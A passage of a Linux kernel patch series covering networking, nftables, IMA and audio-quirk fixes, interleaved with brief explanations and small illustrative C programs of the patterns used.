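The static_assert pins sizeof(struct bpf_fib_lookup) at 64 bytes so any later field addition breaks the build instead of silently spilling the struct across cache lines. The same trick in a self-contained file; the layout below is invented for illustration:

#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* A UAPI-style struct whose size is part of the ABI; the fields
 * here are illustrative, not the real bpf_fib_lookup layout. */
struct fib_lookup_args {
	uint8_t  family;
	uint8_t  l4_protocol;
	uint16_t sport, dport;
	uint16_t tot_len;
	uint32_t ifindex;
	uint8_t  pad[52];
};

/* Fails to compile the moment someone grows the struct past one
 * 64-byte cache line, instead of silently regressing performance. */
static_assert(sizeof(struct fib_lookup_args) == 64,
	      "struct fib_lookup_args size check");

int main(void)
{
	printf("sizeof = %zu\n", sizeof(struct fib_lookup_args));
	return 0;
}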
+diff --git a/net/core/xdp.c b/net/core/xdp.c
+index 844c9d99dc0ec..c3f6653b42742 100644
+--- a/net/core/xdp.c
++++ b/net/core/xdp.c
+@@ -292,10 +292,8 @@ static struct xdp_mem_allocator *__xdp_reg_mem_model(struct xdp_mem_info *mem,
+ 		mutex_lock(&mem_id_lock);
+ 		ret = __mem_id_init_hash_table();
+ 		mutex_unlock(&mem_id_lock);
+-		if (ret < 0) {
+-			WARN_ON(1);
++		if (ret < 0)
+ 			return ERR_PTR(ret);
+-		}
+ 	}
+ 
+ 	xdp_alloc = kzalloc(sizeof(*xdp_alloc), gfp);
+diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
+index 9fe6d96797169..f4a2dce3e1048 100644
+--- a/net/dccp/ipv4.c
++++ b/net/dccp/ipv4.c
+@@ -654,8 +654,11 @@ int dccp_v4_conn_request(struct sock *sk, struct sk_buff *skb)
+ 	if (dccp_v4_send_response(sk, req))
+ 		goto drop_and_free;
+ 
+-	inet_csk_reqsk_queue_hash_add(sk, req, DCCP_TIMEOUT_INIT);
+-	reqsk_put(req);
++	if (unlikely(!inet_csk_reqsk_queue_hash_add(sk, req, DCCP_TIMEOUT_INIT)))
++		reqsk_free(req);
++	else
++		reqsk_put(req);
++
+ 	return 0;
+ 
+ drop_and_free:
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index e0b0bf75a46c2..016af0301366d 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -397,8 +397,11 @@ static int dccp_v6_conn_request(struct sock *sk, struct sk_buff *skb)
+ 	if (dccp_v6_send_response(sk, req))
+ 		goto drop_and_free;
+ 
+-	inet_csk_reqsk_queue_hash_add(sk, req, DCCP_TIMEOUT_INIT);
+-	reqsk_put(req);
++	if (unlikely(!inet_csk_reqsk_queue_hash_add(sk, req, DCCP_TIMEOUT_INIT)))
++		reqsk_free(req);
++	else
++		reqsk_put(req);
++
+ 	return 0;
+ 
+ drop_and_free:
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 8407098a59391..c267c5e066e94 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -1113,25 +1113,34 @@ static void reqsk_timer_handler(struct timer_list *t)
+ 	inet_csk_reqsk_queue_drop_and_put(oreq->rsk_listener, oreq);
+ }
+ 
+-static void reqsk_queue_hash_req(struct request_sock *req,
++static bool reqsk_queue_hash_req(struct request_sock *req,
+ 				 unsigned long timeout)
+ {
++	bool found_dup_sk = false;
++
++	if (!inet_ehash_insert(req_to_sk(req), NULL, &found_dup_sk))
++		return false;
++
++	/* The timer needs to be setup after a successful insertion. */
+ 	timer_setup(&req->rsk_timer, reqsk_timer_handler, TIMER_PINNED);
+ 	mod_timer(&req->rsk_timer, jiffies + timeout);
+ 
+-	inet_ehash_insert(req_to_sk(req), NULL, NULL);
+ 	/* before letting lookups find us, make sure all req fields
+ 	 * are committed to memory and refcnt initialized.
+ 	 */
+ 	smp_wmb();
+ 	refcount_set(&req->rsk_refcnt, 2 + 1);
++	return true;
+ }
+ 
+-void inet_csk_reqsk_queue_hash_add(struct sock *sk, struct request_sock *req,
++bool inet_csk_reqsk_queue_hash_add(struct sock *sk, struct request_sock *req,
+ 				   unsigned long timeout)
+ {
+-	reqsk_queue_hash_req(req, timeout);
++	if (!reqsk_queue_hash_req(req, timeout))
++		return false;
++
+ 	inet_csk_reqsk_queue_added(sk);
++	return true;
+ }
+ EXPORT_SYMBOL_GPL(inet_csk_reqsk_queue_hash_add);
+ 
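
inet_csk_reqsk_queue_hash_add() now reports insertion failure and arms rsk_timer only after the request is visible in the hash, so callers can free a rejected request without racing a live timer. A rough sketch of the ordering; the duplicate detection is faked with a flag:

#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>

struct req {
	bool hashed;
	bool timer_armed;
};

/* Hypothetical hash insert that fails when a duplicate exists. */
static bool ehash_insert(struct req *r, bool found_dup)
{
	if (found_dup)
		return false;
	r->hashed = true;
	return true;
}

/* Arm the timer only after the request is visible in the hash; on
 * failure the caller simply frees the request, and no timer is
 * left referencing freed memory. */
static bool queue_hash_req(struct req *r, bool found_dup)
{
	if (!ehash_insert(r, found_dup))
		return false;
	r->timer_armed = true;
	return true;
}

int main(void)
{
	struct req *r = calloc(1, sizeof(*r));

	if (!r)
		return 1;
	if (!queue_hash_req(r, true)) {
		printf("insert failed, freeing request\n");
		free(r);
	}
	return 0;
}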
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index d85dd394d5b44..2146299016eda 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -2754,13 +2754,37 @@ static void tcp_mtup_probe_success(struct sock *sk)
+ 	NET_INC_STATS(sock_net(sk), LINUX_MIB_TCPMTUPSUCCESS);
+ }
+ 
++/* Sometimes we deduce that packets have been dropped due to reasons other than
++ * congestion, like path MTU reductions or failed client TFO attempts. In these
++ * cases we call this function to retransmit as many packets as cwnd allows,
++ * without reducing cwnd. Given that retransmits will set retrans_stamp to a
++ * non-zero value (and may do so in a later calling context due to TSQ), we
++ * also enter CA_Loss so that we track when all retransmitted packets are ACKed
++ * and clear retrans_stamp when that happens (to ensure later recurring RTOs
++ * are using the correct retrans_stamp and don't declare ETIMEDOUT
++ * prematurely).
++ */
++static void tcp_non_congestion_loss_retransmit(struct sock *sk)
++{
++	const struct inet_connection_sock *icsk = inet_csk(sk);
++	struct tcp_sock *tp = tcp_sk(sk);
++
++	if (icsk->icsk_ca_state != TCP_CA_Loss) {
++		tp->high_seq = tp->snd_nxt;
++		tp->snd_ssthresh = tcp_current_ssthresh(sk);
++		tp->prior_ssthresh = 0;
++		tp->undo_marker = 0;
++		tcp_set_ca_state(sk, TCP_CA_Loss);
++	}
++	tcp_xmit_retransmit_queue(sk);
++}
++
+ /* Do a simple retransmit without using the backoff mechanisms in
+  * tcp_timer. This is used for path mtu discovery.
+  * The socket is already locked here.
+  */
+ void tcp_simple_retransmit(struct sock *sk)
+ {
+-	const struct inet_connection_sock *icsk = inet_csk(sk);
+ 	struct tcp_sock *tp = tcp_sk(sk);
+ 	struct sk_buff *skb;
+ 	int mss;
+@@ -2800,14 +2824,7 @@ void tcp_simple_retransmit(struct sock *sk)
+ 	 * in network, but units changed and effective
+ 	 * cwnd/ssthresh really reduced now.
+ 	 */
+-	if (icsk->icsk_ca_state != TCP_CA_Loss) {
+-		tp->high_seq = tp->snd_nxt;
+-		tp->snd_ssthresh = tcp_current_ssthresh(sk);
+-		tp->prior_ssthresh = 0;
+-		tp->undo_marker = 0;
+-		tcp_set_ca_state(sk, TCP_CA_Loss);
+-	}
+-	tcp_xmit_retransmit_queue(sk);
++	tcp_non_congestion_loss_retransmit(sk);
+ }
+ EXPORT_SYMBOL(tcp_simple_retransmit);
+ 
+@@ -6145,8 +6162,7 @@ static bool tcp_rcv_fastopen_synack(struct sock *sk, struct sk_buff *synack,
+ 			tp->fastopen_client_fail = TFO_DATA_NOT_ACKED;
+ 		skb_rbtree_walk_from(data)
+ 			 tcp_mark_skb_lost(sk, data);
+-		tcp_xmit_retransmit_queue(sk);
+-		tp->retrans_stamp = 0;
++		tcp_non_congestion_loss_retransmit(sk);
+ 		NET_INC_STATS(sock_net(sk),
+ 				LINUX_MIB_TCPFASTOPENACTIVEFAIL);
+ 		return true;
+@@ -7053,7 +7069,12 @@ int tcp_conn_request(struct request_sock_ops *rsk_ops,
+ 		tcp_rsk(req)->tfo_listener = false;
+ 		if (!want_cookie) {
+ 			req->timeout = tcp_timeout_init((struct sock *)req);
+-			inet_csk_reqsk_queue_hash_add(sk, req, req->timeout);
++			if (unlikely(!inet_csk_reqsk_queue_hash_add(sk, req,
++								    req->timeout))) {
++				reqsk_free(req);
++				return 0;
++			}
++
+ 		}
+ 		af_ops->send_synack(sk, dst, &fl, req, &foc,
+ 				    !want_cookie ? TCP_SYNACK_NORMAL :
+diff --git a/net/iucv/iucv.c b/net/iucv/iucv.c
+index f66b5f74cd83a..db41eb2d977f2 100644
+--- a/net/iucv/iucv.c
++++ b/net/iucv/iucv.c
+@@ -519,7 +519,7 @@ static void iucv_setmask_mp(void)
+  */
+ static void iucv_setmask_up(void)
+ {
+-	cpumask_t cpumask;
++	static cpumask_t cpumask;
+ 	int cpu;
+ 
+ 	/* Disable all cpu but the first in cpu_irq_cpumask. */
+@@ -627,23 +627,33 @@ static int iucv_cpu_online(unsigned int cpu)
+ 
+ static int iucv_cpu_down_prep(unsigned int cpu)
+ {
+-	cpumask_t cpumask;
++	cpumask_var_t cpumask;
++	int ret = 0;
+ 
+ 	if (!iucv_path_table)
+ 		return 0;
+ 
+-	cpumask_copy(&cpumask, &iucv_buffer_cpumask);
+-	cpumask_clear_cpu(cpu, &cpumask);
+-	if (cpumask_empty(&cpumask))
++	if (!alloc_cpumask_var(&cpumask, GFP_KERNEL))
++		return -ENOMEM;
++
++	cpumask_copy(cpumask, &iucv_buffer_cpumask);
++	cpumask_clear_cpu(cpu, cpumask);
++	if (cpumask_empty(cpumask)) {
+ 		/* Can't offline last IUCV enabled cpu. */
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto __free_cpumask;
++	}
+ 
+ 	iucv_retrieve_cpu(NULL);
+ 	if (!cpumask_empty(&iucv_irq_cpumask))
+-		return 0;
++		goto __free_cpumask;
++
+ 	smp_call_function_single(cpumask_first(&iucv_buffer_cpumask),
+ 				 iucv_allow_cpu, NULL, 1);
+-	return 0;
++
++__free_cpumask:
++	free_cpumask_var(cpumask);
++	return ret;
+ }
+ 
+ /**
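
The iucv hunks stop placing cpumask_t on the kernel stack, where it can be hundreds of bytes with large NR_CPUS, and funnel all exits through a single free. A userspace model of the pattern using a heap-allocated temporary mask:

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Model of a mask too large for the kernel stack when NR_CPUS is
 * big; the kernel uses alloc_cpumask_var() instead of malloc. */
struct cpumask { unsigned long bits[64]; };	/* up to 4096 CPUs */

static int down_prep(const struct cpumask *online, int cpu)
{
	struct cpumask *tmp = calloc(1, sizeof(*tmp));
	int ret = 0;

	if (!tmp)
		return -ENOMEM;

	memcpy(tmp, online, sizeof(*tmp));
	tmp->bits[cpu / 64] &= ~(1ul << (cpu % 64));

	/* ... decide based on the temporary copy ... */

	free(tmp);	/* single exit path frees the mask */
	return ret;
}

int main(void)
{
	struct cpumask online = { .bits = { 0x3 } };

	printf("down_prep: %d\n", down_prep(&online, 1));
	return 0;
}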
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 1c4b7a8ec2cc6..97ea72d31bd35 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -5398,8 +5398,7 @@ static int nf_tables_fill_setelem(struct sk_buff *skb,
+ 
+ 	if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA) &&
+ 	    nft_data_dump(skb, NFTA_SET_ELEM_DATA, nft_set_ext_data(ext),
+-			  set->dtype == NFT_DATA_VERDICT ? NFT_DATA_VERDICT : NFT_DATA_VALUE,
+-			  set->dlen) < 0)
++			  nft_set_datatype(set), set->dlen) < 0)
+ 		goto nla_put_failure;
+ 
+ 	if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPRESSIONS) &&
+@@ -9377,6 +9376,7 @@ struct nft_trans_gc *nft_trans_gc_catchall_async(struct nft_trans_gc *gc,
+ struct nft_trans_gc *nft_trans_gc_catchall_sync(struct nft_trans_gc *gc)
+ {
+ 	struct nft_set_elem_catchall *catchall, *next;
++	u64 tstamp = nft_net_tstamp(gc->net);
+ 	const struct nft_set *set = gc->set;
+ 	struct nft_set_elem elem;
+ 	struct nft_set_ext *ext;
+@@ -9386,7 +9386,7 @@ struct nft_trans_gc *nft_trans_gc_catchall_sync(struct nft_trans_gc *gc)
+ 	list_for_each_entry_safe(catchall, next, &set->catchall_list, list) {
+ 		ext = nft_set_elem_ext(set, catchall->elem);
+ 
+-		if (!nft_set_elem_expired(ext))
++		if (!__nft_set_elem_expired(ext, tstamp))
+ 			continue;
+ 
+ 		gc = nft_trans_gc_queue_sync(gc, GFP_KERNEL);
+@@ -10138,6 +10138,7 @@ static bool nf_tables_valid_genid(struct net *net, u32 genid)
+ 	bool genid_ok;
+ 
+ 	mutex_lock(&nft_net->commit_mutex);
++	nft_net->tstamp = get_jiffies_64();
+ 
+ 	genid_ok = genid == 0 || nft_net->base_seq == genid;
+ 	if (!genid_ok)
+@@ -10446,6 +10447,9 @@ static int nft_validate_register_store(const struct nft_ctx *ctx,
+ 
+ 		return 0;
+ 	default:
++		if (type != NFT_DATA_VALUE)
++			return -EINVAL;
++
+ 		if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)
+ 			return -EINVAL;
+ 		if (len == 0)
+@@ -10454,8 +10458,6 @@ static int nft_validate_register_store(const struct nft_ctx *ctx,
+ 		    sizeof_field(struct nft_regs, data))
+ 			return -ERANGE;
+ 
+-		if (data != NULL && type != NFT_DATA_VALUE)
+-			return -EINVAL;
+ 		return 0;
+ 	}
+ }
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index 68a5dea805480..33daee2e54c5c 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -136,7 +136,8 @@ static int nft_lookup_init(const struct nft_ctx *ctx,
+ 			return -EINVAL;
+ 
+ 		err = nft_parse_register_store(ctx, tb[NFTA_LOOKUP_DREG],
+-					       &priv->dreg, NULL, set->dtype,
++					       &priv->dreg, NULL,
++					       nft_set_datatype(set),
+ 					       set->dlen);
+ 		if (err < 0)
+ 			return err;
+diff --git a/net/netfilter/nft_set_hash.c b/net/netfilter/nft_set_hash.c
+index 2013de934cef0..1fd3b413350dc 100644
+--- a/net/netfilter/nft_set_hash.c
++++ b/net/netfilter/nft_set_hash.c
+@@ -35,6 +35,7 @@ struct nft_rhash_cmp_arg {
+ 	const struct nft_set		*set;
+ 	const u32			*key;
+ 	u8				genmask;
++	u64				tstamp;
+ };
+ 
+ static inline u32 nft_rhash_key(const void *data, u32 len, u32 seed)
+@@ -61,7 +62,7 @@ static inline int nft_rhash_cmp(struct rhashtable_compare_arg *arg,
+ 		return 1;
+ 	if (nft_set_elem_is_dead(&he->ext))
+ 		return 1;
+-	if (nft_set_elem_expired(&he->ext))
++	if (__nft_set_elem_expired(&he->ext, x->tstamp))
+ 		return 1;
+ 	if (!nft_set_elem_active(&he->ext, x->genmask))
+ 		return 1;
+@@ -86,6 +87,7 @@ bool nft_rhash_lookup(const struct net *net, const struct nft_set *set,
+ 		.genmask = nft_genmask_cur(net),
+ 		.set	 = set,
+ 		.key	 = key,
++		.tstamp  = get_jiffies_64(),
+ 	};
+ 
+ 	he = rhashtable_lookup(&priv->ht, &arg, nft_rhash_params);
+@@ -104,6 +106,7 @@ static void *nft_rhash_get(const struct net *net, const struct nft_set *set,
+ 		.genmask = nft_genmask_cur(net),
+ 		.set	 = set,
+ 		.key	 = elem->key.val.data,
++		.tstamp  = get_jiffies_64(),
+ 	};
+ 
+ 	he = rhashtable_lookup(&priv->ht, &arg, nft_rhash_params);
+@@ -127,6 +130,7 @@ static bool nft_rhash_update(struct nft_set *set, const u32 *key,
+ 		.genmask = NFT_GENMASK_ANY,
+ 		.set	 = set,
+ 		.key	 = key,
++		.tstamp  = get_jiffies_64(),
+ 	};
+ 
+ 	he = rhashtable_lookup(&priv->ht, &arg, nft_rhash_params);
+@@ -170,6 +174,7 @@ static int nft_rhash_insert(const struct net *net, const struct nft_set *set,
+ 		.genmask = nft_genmask_next(net),
+ 		.set	 = set,
+ 		.key	 = elem->key.val.data,
++		.tstamp	 = nft_net_tstamp(net),
+ 	};
+ 	struct nft_rhash_elem *prev;
+ 
+@@ -212,6 +217,7 @@ static void *nft_rhash_deactivate(const struct net *net,
+ 		.genmask = nft_genmask_next(net),
+ 		.set	 = set,
+ 		.key	 = elem->key.val.data,
++		.tstamp	 = nft_net_tstamp(net),
+ 	};
+ 
+ 	rcu_read_lock();
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 2299ced939c47..a56ed216c2233 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -504,6 +504,7 @@ bool nft_pipapo_lookup(const struct net *net, const struct nft_set *set,
+  * @set:	nftables API set representation
+  * @data:	Key data to be matched against existing elements
+  * @genmask:	If set, check that element is active in given genmask
++ * @tstamp:	timestamp to check for expired elements
+  *
+  * This is essentially the same as the lookup function, except that it matches
+  * key data against the uncommitted copy and doesn't use preallocated maps for
+@@ -513,7 +514,8 @@ bool nft_pipapo_lookup(const struct net *net, const struct nft_set *set,
+  */
+ static struct nft_pipapo_elem *pipapo_get(const struct net *net,
+ 					  const struct nft_set *set,
+-					  const u8 *data, u8 genmask)
++					  const u8 *data, u8 genmask,
++					  u64 tstamp)
+ {
+ 	struct nft_pipapo_elem *ret = ERR_PTR(-ENOENT);
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+@@ -566,7 +568,7 @@ static struct nft_pipapo_elem *pipapo_get(const struct net *net,
+ 			goto out;
+ 
+ 		if (last) {
+-			if (nft_set_elem_expired(&f->mt[b].e->ext))
++			if (__nft_set_elem_expired(&f->mt[b].e->ext, tstamp))
+ 				goto next_match;
+ 			if ((genmask &&
+ 			     !nft_set_elem_active(&f->mt[b].e->ext, genmask)))
+@@ -603,7 +605,7 @@ static void *nft_pipapo_get(const struct net *net, const struct nft_set *set,
+ 			    const struct nft_set_elem *elem, unsigned int flags)
+ {
+ 	return pipapo_get(net, set, (const u8 *)elem->key.val.data,
+-			 nft_genmask_cur(net));
++			 nft_genmask_cur(net), get_jiffies_64());
+ }
+ 
+ /**
+@@ -1197,6 +1199,7 @@ static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+ 	struct nft_pipapo_match *m = priv->clone;
+ 	u8 genmask = nft_genmask_next(net);
++	u64 tstamp = nft_net_tstamp(net);
+ 	struct nft_pipapo_field *f;
+ 	const u8 *start_p, *end_p;
+ 	int i, bsize_max, err = 0;
+@@ -1206,7 +1209,7 @@ static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,
+ 	else
+ 		end = start;
+ 
+-	dup = pipapo_get(net, set, start, genmask);
++	dup = pipapo_get(net, set, start, genmask, tstamp);
+ 	if (!IS_ERR(dup)) {
+ 		/* Check if we already have the same exact entry */
+ 		const struct nft_data *dup_key, *dup_end;
+@@ -1228,7 +1231,7 @@ static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,
+ 
+ 	if (PTR_ERR(dup) == -ENOENT) {
+ 		/* Look for partially overlapping entries */
+-		dup = pipapo_get(net, set, end, nft_genmask_next(net));
++		dup = pipapo_get(net, set, end, nft_genmask_next(net), tstamp);
+ 	}
+ 
+ 	if (PTR_ERR(dup) != -ENOENT) {
+@@ -1581,6 +1584,7 @@ static void pipapo_gc(const struct nft_set *_set, struct nft_pipapo_match *m)
+ 	struct nft_set *set = (struct nft_set *) _set;
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+ 	struct net *net = read_pnet(&set->net);
++	u64 tstamp = nft_net_tstamp(net);
+ 	int rules_f0, first_rule = 0;
+ 	struct nft_pipapo_elem *e;
+ 	struct nft_trans_gc *gc;
+@@ -1615,7 +1619,7 @@ static void pipapo_gc(const struct nft_set *_set, struct nft_pipapo_match *m)
+ 		/* synchronous gc never fails, there is no need to set on
+ 		 * NFT_SET_ELEM_DEAD_BIT.
+ 		 */
+-		if (nft_set_elem_expired(&e->ext)) {
++		if (__nft_set_elem_expired(&e->ext, tstamp)) {
+ 			priv->dirty = true;
+ 
+ 			gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
+@@ -1786,7 +1790,7 @@ static void *pipapo_deactivate(const struct net *net, const struct nft_set *set,
+ {
+ 	struct nft_pipapo_elem *e;
+ 
+-	e = pipapo_get(net, set, data, nft_genmask_next(net));
++	e = pipapo_get(net, set, data, nft_genmask_next(net), nft_net_tstamp(net));
+ 	if (IS_ERR(e))
+ 		return NULL;
+ 
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 5bf5572e945cc..021d9e76129a5 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -314,6 +314,7 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 	struct nft_rbtree *priv = nft_set_priv(set);
+ 	u8 cur_genmask = nft_genmask_cur(net);
+ 	u8 genmask = nft_genmask_next(net);
++	u64 tstamp = nft_net_tstamp(net);
+ 	int d;
+ 
+ 	/* Descend the tree to search for an existing element greater than the
+@@ -361,7 +362,7 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 		/* perform garbage collection to avoid bogus overlap reports
+ 		 * but skip new elements in this transaction.
+ 		 */
+-		if (nft_set_elem_expired(&rbe->ext) &&
++		if (__nft_set_elem_expired(&rbe->ext, tstamp) &&
+ 		    nft_set_elem_active(&rbe->ext, cur_genmask)) {
+ 			const struct nft_rbtree_elem *removed_end;
+ 
+@@ -548,6 +549,7 @@ static void *nft_rbtree_deactivate(const struct net *net,
+ 	const struct rb_node *parent = priv->root.rb_node;
+ 	struct nft_rbtree_elem *rbe, *this = elem->priv;
+ 	u8 genmask = nft_genmask_next(net);
++	u64 tstamp = nft_net_tstamp(net);
+ 	int d;
+ 
+ 	while (parent != NULL) {
+@@ -568,7 +570,7 @@ static void *nft_rbtree_deactivate(const struct net *net,
+ 				   nft_rbtree_interval_end(this)) {
+ 				parent = parent->rb_right;
+ 				continue;
+-			} else if (nft_set_elem_expired(&rbe->ext)) {
++			} else if (__nft_set_elem_expired(&rbe->ext, tstamp)) {
+ 				break;
+ 			} else if (!nft_set_elem_active(&rbe->ext, genmask)) {
+ 				parent = parent->rb_left;
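
Both set-backend hunks above apply the same fix: rather than sampling the clock anew in every expiry test, the caller captures one timestamp (get_jiffies_64() for lookups, nft_net_tstamp(net) for transaction processing) and threads it through, so every decision within a single walk agrees. A minimal standalone sketch of that pattern, with hypothetical types and names rather than the kernel's:

#include <stdbool.h>
#include <stdint.h>

struct elem {
	uint64_t expires;	/* absolute expiry time, 0 = never */
};

static bool elem_expired(const struct elem *e, uint64_t tstamp)
{
	return e->expires && tstamp > e->expires;
}

static unsigned int gc_walk(const struct elem *tbl, unsigned int n,
			    uint64_t now)
{
	uint64_t tstamp = now;	/* captured once, reused for every element */
	unsigned int reaped = 0;

	for (unsigned int i = 0; i < n; i++)
		if (elem_expired(&tbl[i], tstamp))
			reaped++;	/* a real GC would also unlink it */
	return reaped;
}
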
+diff --git a/scripts/Makefile.dtbinst b/scripts/Makefile.dtbinst
+index 190d781e84f4b..3668259ddb65d 100644
+--- a/scripts/Makefile.dtbinst
++++ b/scripts/Makefile.dtbinst
+@@ -24,7 +24,7 @@ __dtbs_install: $(dtbs) $(subdirs)
+ 	@:
+ 
+ quiet_cmd_dtb_install = INSTALL $@
+-      cmd_dtb_install = install -D $< $@
++      cmd_dtb_install = install -D -m 0644 $< $@
+ 
+ $(dst)/%.dtb: $(obj)/%.dtb
+ 	$(call cmd,dtb_install)
+diff --git a/security/integrity/ima/ima_api.c b/security/integrity/ima/ima_api.c
+index 026c8c9db9920..fed2b0b6b9ec4 100644
+--- a/security/integrity/ima/ima_api.c
++++ b/security/integrity/ima/ima_api.c
+@@ -244,8 +244,8 @@ int ima_collect_measurement(struct integrity_iint_cache *iint,
+ 	const char *audit_cause = "failed";
+ 	struct inode *inode = file_inode(file);
+ 	struct inode *real_inode = d_real_inode(file_dentry(file));
+-	const char *filename = file->f_path.dentry->d_name.name;
+ 	struct ima_max_digest_data hash;
++	struct name_snapshot filename;
+ 	int result = 0;
+ 	int length;
+ 	void *tmpbuf;
+@@ -319,9 +319,13 @@ int ima_collect_measurement(struct integrity_iint_cache *iint,
+ 		if (file->f_flags & O_DIRECT)
+ 			audit_cause = "failed(directio)";
+ 
++		take_dentry_name_snapshot(&filename, file->f_path.dentry);
++
+ 		integrity_audit_msg(AUDIT_INTEGRITY_DATA, inode,
+-				    filename, "collect_data", audit_cause,
+-				    result, 0);
++				    filename.name.name, "collect_data",
++				    audit_cause, result, 0);
++
++		release_dentry_name_snapshot(&filename);
+ 	}
+ 	return result;
+ }
+@@ -434,6 +438,7 @@ void ima_audit_measurement(struct integrity_iint_cache *iint,
+  */
+ const char *ima_d_path(const struct path *path, char **pathbuf, char *namebuf)
+ {
++	struct name_snapshot filename;
+ 	char *pathname = NULL;
+ 
+ 	*pathbuf = __getname();
+@@ -447,7 +452,10 @@ const char *ima_d_path(const struct path *path, char **pathbuf, char *namebuf)
+ 	}
+ 
+ 	if (!pathname) {
+-		strscpy(namebuf, path->dentry->d_name.name, NAME_MAX);
++		take_dentry_name_snapshot(&filename, path->dentry);
++		strscpy(namebuf, filename.name.name, NAME_MAX);
++		release_dentry_name_snapshot(&filename);
++
+ 		pathname = namebuf;
+ 	}
+ 
+diff --git a/security/integrity/ima/ima_template_lib.c b/security/integrity/ima/ima_template_lib.c
+index 7bf9b15072202..41ec31debe870 100644
+--- a/security/integrity/ima/ima_template_lib.c
++++ b/security/integrity/ima/ima_template_lib.c
+@@ -483,7 +483,10 @@ static int ima_eventname_init_common(struct ima_event_data *event_data,
+ 				     bool size_limit)
+ {
+ 	const char *cur_filename = NULL;
++	struct name_snapshot filename;
+ 	u32 cur_filename_len = 0;
++	bool snapshot = false;
++	int ret;
+ 
+ 	BUG_ON(event_data->filename == NULL && event_data->file == NULL);
+ 
+@@ -496,7 +499,10 @@ static int ima_eventname_init_common(struct ima_event_data *event_data,
+ 	}
+ 
+ 	if (event_data->file) {
+-		cur_filename = event_data->file->f_path.dentry->d_name.name;
++		take_dentry_name_snapshot(&filename,
++					  event_data->file->f_path.dentry);
++		snapshot = true;
++		cur_filename = filename.name.name;
+ 		cur_filename_len = strlen(cur_filename);
+ 	} else
+ 		/*
+@@ -505,8 +511,13 @@ static int ima_eventname_init_common(struct ima_event_data *event_data,
+ 		 */
+ 		cur_filename_len = IMA_EVENT_NAME_LEN_MAX;
+ out:
+-	return ima_write_template_field_data(cur_filename, cur_filename_len,
+-					     DATA_FMT_STRING, field_data);
++	ret = ima_write_template_field_data(cur_filename, cur_filename_len,
++					    DATA_FMT_STRING, field_data);
++
++	if (snapshot)
++		release_dentry_name_snapshot(&filename);
++
++	return ret;
+ }
+ 
+ /*
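
The two IMA files above stop dereferencing file->f_path.dentry->d_name.name directly, which is unsafe against a concurrent rename, and instead hold a name snapshot across the use. A short sketch of the idiom, assuming only the dcache helpers the hunks themselves call:

#include <linux/dcache.h>
#include <linux/printk.h>

static void log_dentry_name(struct dentry *dentry)
{
	struct name_snapshot snap;

	/* copy the name while it is stable */
	take_dentry_name_snapshot(&snap, dentry);
	pr_info("name: %s\n", snap.name.name);
	release_dentry_name_snapshot(&snap);
}
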
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 60866e8e1d961..11ec5783a2f17 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9807,6 +9807,9 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c7c, "HP ProBook 445 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8c7d, "HP ProBook 465 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8c7e, "HP ProBook 465 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8c7f, "HP EliteBook 645 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8c80, "HP EliteBook 645 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8c81, "HP EliteBook 665 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8c89, "HP ProBook 460 G11", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c8a, "HP EliteBook 630", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c8c, "HP EliteBook 660", ALC236_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/amd/acp/acp-i2s.c b/sound/soc/amd/acp/acp-i2s.c
+index ac416572db0d3..3c78207f9ad9d 100644
